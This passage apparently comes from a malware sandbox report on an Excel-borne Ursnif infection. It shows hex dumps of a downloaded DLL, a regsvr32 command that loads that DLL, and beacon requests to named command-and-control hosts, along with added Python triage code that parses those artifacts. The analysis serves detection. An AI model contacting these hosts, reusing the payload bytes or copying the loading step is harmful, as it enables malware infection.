                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 
15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELHn`!;P@`T< 0@.text `.dataHq@.rsrc @@.reloc0@B
                                                                                                                                                                            May 3, 2021 19:48:16.084423065 CEST1322INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: ,n^H6 p|
                                                                                                                                                                            May 3, 2021 19:48:16.084435940 CEST1323INData Raw: d2 ec 41 6f 06 3f 88 b6 f5 e2 f6 24 07 a5 60 8e 49 07 9b c9 cb b3 1a 49 12 45 a0 ce 76 c2 f9 cc 36 48 d8 13 ea 05 a1 ce b3 d0 24 55 37 51 a5 d1 b7 ce 1e 53 35 4b 60 8e 48 f1 a7 d1 b3 cd 22 51 35 4d a0 ce 2e b3 25 51 ff 7d a8 0e 4f 22 a5 d3 bf 48
                                                                                                                                                                            Data Ascii: Ao?$`IIEv6H$U7QS5K`H"Q5M.%Q}O"HT]urUB@HK;T2o}^shP~e~yb"Q lBLH$Np/88q`( "q|6u`?99Nq(yP}}
                                                                                                                                                                            May 3, 2021 19:48:16.084449053 CEST1325INData Raw: 7b 7b 7b 7b fa fa fa fa 78 78 78 78 12 fa fa fa b8 e3 39 53 6f 6a ca 7d 73 7d 93 ef cf 78 f1 fb 17 e8 49 fe b5 8b f3 29 cc 7b f2 c8 47 ec 4d fa f3 3e 44 f1 79 17 ec 4d b8 35 0b 4d 6b ca 7d 2b 73 4d f5 ec cf 78 2e 12 f8 96 76 b0 35 38 b5 83 58 69
                                                                                                                                                                            Data Ascii: {{{{xxxx9Soj}s}xI){GM>DyM5Mk}+sMx.v58Xi{-yAckxq;}b}Ix]xubL|V{kckMq}wwxxuqhm{;qInx<vkIuzRxP8K{{*iqoxsyeuMxI9
                                                                                                                                                                            May 3, 2021 19:48:16.084465981 CEST1326INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc fc fc ff f0 f0 f0 ff e1 e1 e1 ff c3 d9 d5 ff 91 d7 cd ff 5d d6 c3 ff 4a d4 bf ff 49 d4 bf ff 49 d4 be ff 49 d3 be ff 49 d3 bd ff 44 c4 b0 ff 37
                                                                                                                                                                            Data Ascii: ]JIIIID7;@;740-+(%#~"}zxvsrpm~k|hzkVgRbM3
                                                                                                                                                                            May 3, 2021 19:48:16.084486008 CEST1327INData Raw: e9 bd ff 01 7d 68 ff 07 7f 6c ff 0c 82 6f ff 11 85 72 ff 15 88 75 ff 1a 8b 79 ff 1f 8f 7c ff 21 91 7e ff 25 94 82 ff 28 96 83 ff 2a 97 85 ff 2c 99 87 ff 2e 9c 89 ff 32 a1 8d ff 34 a5 91 ff 37 aa 96 ff 3a b1 9b ff 3e b9 a3 ff 43 c4 ad ff 3b a9 94
                                                                                                                                                                            Data Ascii: }hloruy|!~%(*,.247:>C;2x5z;LQQPj
                                                                                                                                                                            May 3, 2021 19:48:16.084508896 CEST1329INData Raw: ff 28 a8 93 ff 25 a0 8c ff 24 9a 87 ff 21 95 82 ff 1e 91 7e ff 1c 8e 7b ff 1a 8c 7a ff 19 8b 78 ff 17 89 77 ff 14 88 75 ff 10 86 73 ff 0c 84 70 ff 07 81 6d ff 05 9c 81 ff 00 ef c3 ff 00 d0 a9 ff 00 72 5c ff 00 6e 58 ff 00 69 53 ff 00 00 00 33 00
                                                                                                                                                                            Data Ascii: (%$!~{zxwuspmr\nXiS3jToYs]lortvy| ~$&(
                                                                                                                                                                            May 3, 2021 19:48:16.084530115 CEST1330INData Raw: f8 f8 ff f6 f6 f6 ff f4 f4 f4 ff f2 f2 f2 ff f0 f0 f0 ff ef ef ef ff ed ed ed ff ec ec ec ff eb eb eb ff eb eb eb ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea
                                                                                                                                                                            Data Ascii: ZBBB0#!}{xv
                                                                                                                                                                            May 3, 2021 19:48:16.084549904 CEST1331INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 5a ff 00 75 5f ff 00 79 63 ff 00 f9 cd ff 00
                                                                                                                                                                            Data Ascii: pZu_ycquwz{}~"$&'*-1(*yPPO
                                                                                                                                                                            May 3, 2021 19:48:16.084573030 CEST1333INData Raw: eb eb ff eb eb eb ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff eb eb eb ff ec ec ec ff ed ed ed ff ef ef ef ff f2 f2 f2 ff f5 f5 f5 ff f8 f8 f8 ff fc fc fc ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                            Data Ascii: [>><&}zv{ewar\3
                                                                                                                                                                            May 3, 2021 19:48:16.265486956 CEST1338INData Raw: 43 64 7b 00 00 61 81 ff ff 00 00 00 00 26 73 24 21 b3 38 72 5d 18 36 52 f5 ff ff 00 00 00 29 74 8f 79 6f 5d a1 00 00 00 cf 51 bf 39 42 7d 39 bf ff ff 00 00 00 00 ff 21 ae fe 78 f0 ff 20 20 00 88 a8 d7 6e 94 f8 6d 88 f0 00 20 20 00 00 00 00 00 ab
                                                                                                                                                                            Data Ascii: Cd{a&s$!8r]6R)tyo]Q9B}9!x nm `3*|4ZDr Mj =|@?r)\Xl.6t!|rZ|vcw@u @Y8N9E2
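What session 0 delivered is worth checking from the bytes rather than inferring from the file name: EXCEL.EXE, sending the legacy MSIE 7.0 user agent that urlmon uses on behalf of non-browser processes (consistent with the UrlDownloadToFile signature at the top of the report), received application/x-msdownload and a body that begins with MZ. The Python below is an added example, not part of the Joe Sandbox report or of its tooling. It carries the session fields and the first 256 bytes of the response body copied from the Data Raw dump above, parses the DOS and COFF headers, and decodes the host-header value; the finding rules and the list of Office image names are this example's own assumptions.

```python
"""Check what session 0 actually delivered to EXCEL.EXE.

Added example; not part of the Joe Sandbox report and not one of its tools.
Session fields and the first 0x100 bytes of the response body are copied
from the report's "Data Raw" dump; the classification rules are this
example's own heuristics."""
import base64
import struct
from datetime import datetime, timezone

# Session 0 as recorded above; body_head is the start of the response body.
SESSION_0 = {
    "process": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
    "request": "GET /presentation.dll HTTP/1.1",
    "host": "docs.atu.ngr.mybluehost.me",
    "response_headers": {
        "Content-Type": "application/x-msdownload",
        "Content-Length": "312832",
        "host-header": "c2hhcmVkLmJsdWVob3N0LmNvbQ==",
    },
    "body_head": bytes.fromhex(
        "4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"
        "00000000000000000000000000000000" "000000000000000000000000e0000000"
        "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
        "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
        "98d4f0e2dcb59eb1dcb59eb1dcb59eb1" "c2e70bb1ccb59eb1c2e71db181b59eb1"
        "d5cd0db1d9b59eb1dcb59fb1b4b59eb1" "c2e71ab1c3b59eb1c2e70cb1ddb59eb1"
        "c2e70ab1ddb59eb1c2e70fb1ddb59eb1" "52696368dcb59eb10000000000000000"
        "504500004c010400df486e6000000000" "00000000e00002210b01090000900400"
    ),
}

OFFICE_IMAGES = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}  # assumed list
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000


def parse_pe_head(data: bytes) -> dict:
    """Parse the DOS header, the COFF file header and the optional-header magic.

    Raises ValueError when the buffer does not start a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    (machine, sections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,                 # 0x014C is IMAGE_FILE_MACHINE_I386
        "sections": sections,
        "timestamp": timestamp,             # linker timestamp; trivially forgeable
        "optional_header_size": opt_size,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "is_32bit": bool(characteristics & IMAGE_FILE_32BIT_MACHINE),
        "pe32": magic == 0x10B,             # 0x20B would be PE32+
        "dos_stub": data[0x4E:0x75].decode("ascii", "replace"),
    }


def compile_time_iso(timestamp: int) -> str:
    return datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat()


def decode_host_header(value: str) -> str:
    """The shared-hosting 'host-header' value is plain base64 of a hostname."""
    return base64.b64decode(value).decode("ascii")


def triage_download(session: dict) -> list:
    """Return human-readable findings for one HTTP session."""
    findings = []
    try:
        pe = parse_pe_head(session["body_head"])
    except ValueError:
        return findings                     # not a PE image: nothing to report here
    image = session["process"].rsplit("\\", 1)[-1].upper()
    path = session["request"].split()[1]
    kind = ("PE32" if pe["pe32"] else "PE32+") + (" DLL" if pe["is_dll"] else " EXE")
    findings.append(f"body is a {kind}, {pe['sections']} sections, "
                    f"linked {compile_time_iso(pe['timestamp'])}")
    if image in OFFICE_IMAGES:
        findings.append(f"{image} fetched executable code: http://{session['host']}{path}")
    ctype = session["response_headers"].get("Content-Type", "")
    if ctype != "application/x-msdownload":
        findings.append(f"PE served as {ctype!r}: content-type does not match the body")
    if "host-header" in session["response_headers"]:
        findings.append("backend host: "
                        + decode_host_header(session["response_headers"]["host-header"]))
    return findings


if __name__ == "__main__":
    for line in triage_download(SESSION_0):
        print(line)
```

Run against the bytes above it reports a PE32 DLL with four sections (.text, .data, .rsrc and .reloc are visible in the Data Ascii line) and a linker timestamp of 2021-04-08, roughly four weeks before the Last-Modified date the server sent; the timestamp is a pivot for hunting, not a fact, since it costs nothing to forge. The host-header decodes to shared.bluehost.com, which says only that the file sat on shared hosting, as the Host name already suggests.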


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49765
Destination IP: 34.86.224.8
Destination Port: 80
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
May 3, 2021 19:49:26.173763037 CEST | 6094 | OUT | GET /z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: app.buboleinov.com
Connection: Keep-Alive
May 3, 2021 19:49:26.929080009 CEST | 6095 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 May 2021 17:49:26 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49779
Destination IP: 34.86.224.8
Destination Port: 80
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
May 3, 2021 19:50:10.219878912 CEST | 7018 | OUT | GET /pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: chat.billionady.com
Connection: Keep-Alive
May 3, 2021 19:50:10.962115049 CEST | 7019 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 May 2021 17:50:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49782
Destination IP: 34.86.224.8
Destination Port: 80
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
May 3, 2021 19:50:34.266048908 CEST | 7021 | OUT | GET /F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: app3.maintorna.com
Connection: Keep-Alive
May 3, 2021 19:50:35.009057999 CEST | 7021 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 May 2021 17:50:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
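Sessions 1 to 3 are the follow-on traffic from iexplore.exe: three different Host names on one address, each request carrying a long pseudo-random path in which the '+' and '/' of a base64 blob appear as '_2B' and '_2F' and in which '/' has been inserted at arbitrary positions (see '/z641zbWI8F5NGo_/2BArU' and 'XZR_2F6_2/Fm', where the split lands inside an escape), and each answered with an identical chunked, gzip-compressed 404. The Python below is an added example, not part of the report or of any Joe Sandbox tool: hosts, paths, status codes and the body bytes are copied from the three sessions above, the benign control path is constructed, and the reading of the path encoding is this example's own.

```python
"""Beacon heuristics for sessions 1 to 3 above (iexplore.exe -> 34.86.224.8).

Added example; not part of the Joe Sandbox report or of its tooling. Hosts,
paths, status codes and the chunked gzip body are copied from the sessions
above; BENIGN_PATH is constructed; the reading of the path encoding
('_2B'/'_2F' for '+'/'/', slashes inserted afterwards) is this example's own."""
import gzip
import re
from collections import defaultdict
from urllib.parse import unquote

# The 404 body, identical in all three sessions: one 0x6a-byte chunk of gzip
# data followed by the zero-length terminating chunk.
CHUNKED_404 = bytes.fromhex(
    "36610d0a"
    "1f8b0800000000000003" "b3c928c9cdb1e3e5b2c9" "484d4cb1b329c92cc949"
    "b533313051f0cb2f5170" "cb2fcd4bb1d18708dae8" "8395009526e5a75482e8"
    "e4d4bc92d4223b9b0c43" "741d40111b7da834c86c" "a022282f2f3d33af0259"
    "4e1f669a3ed425000bd9" "613392000000"
    "0d0a300d0a0d0a"
)

C2_SESSIONS = [
    {"host": "app.buboleinov.com", "dst": "34.86.224.8", "status": 404, "body": CHUNKED_404,
     "path": "/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE"
             "/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD"
             "/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX"
             "/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH"
             "/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm"},
    {"host": "chat.billionady.com", "dst": "34.86.224.8", "status": 404, "body": CHUNKED_404,
     "path": "/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq"
             "/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj"
             "/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37"
             "/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID"
             "/xExOyq0w/s"},
    {"host": "app3.maintorna.com", "dst": "34.86.224.8", "status": 404, "body": CHUNKED_404,
     "path": "/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX"
             "/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ"
             "/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5"
             "/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l"
             "/DMReAFgM/oHuJg"},
]
BENIGN_PATH = "/static/js/app.min.js?v=1.2.3"   # constructed control, not from the report

ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")        # '_XX' stands in for '%XX'
BASE64_ALPHABET = re.compile(r"[A-Za-z0-9+/=]+")


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body (hex sizes, CRLF-delimited)."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size + 2                               # skip the chunk's trailing CRLF


def decompress_404(raw: bytes) -> str:
    return gzip.decompress(dechunk(raw)).decode("utf-8")


def unmask(path: str) -> str:
    """Remove the inserted '/' and percent-decode the '_XX' escapes."""
    return unquote(ESCAPE.sub(r"%\1", path.replace("/", "")))


def is_ursnif_like(path: str, min_len: int = 100, min_escapes: int = 3) -> bool:
    """Long path, several '_2B'/'_2F' escapes, nothing outside base64 once unmasked."""
    joined = path.replace("/", "")
    escapes = len(re.findall(r"_2[BF]", joined))
    return (len(joined) >= min_len and escapes >= min_escapes
            and BASE64_ALPHABET.fullmatch(unmask(path)) is not None)


def shared_infrastructure(sessions) -> dict:
    """Host names per destination address; several hosts on one IP is a pivot."""
    by_dst = defaultdict(set)
    for s in sessions:
        by_dst[s["dst"]].add(s["host"])
    return {dst: sorted(hosts) for dst, hosts in by_dst.items()}


def identical_404s(sessions) -> bool:
    """All answers 404 with byte-identical bodies: the server is up and uniform."""
    return all(s["status"] == 404 for s in sessions) and len({s["body"] for s in sessions}) == 1


if __name__ == "__main__":
    for s in C2_SESSIONS:
        print(s["host"], "ursnif-like" if is_ursnif_like(s["path"]) else "plain")
    print(shared_infrastructure(C2_SESSIONS), identical_404s(C2_SESSIONS))
    print(decompress_404(CHUNKED_404))
```

Decompressing the body gives the 146-byte stock nginx 404 page, so the server was up and answering; a 404 here does not show that the beacon was rejected, only that no task came back during this run. The base64 payload that unmask() recovers is not interpreted here. The length and escape-count thresholds are starting points to tune against your own proxy logs, and the per-IP host clustering is the cheapest pivot: all three hosts share 34.86.224.8.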


Code Manipulations

Statistics

Charts in the original report (interactive, per process): CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior

System Behavior

General

Start time: 19:48:09
Start date: 03/05/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x220000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:48:16
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s C:\Users\Public\block.dll
                                                                                                                                                                            Imagebase:0x390000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
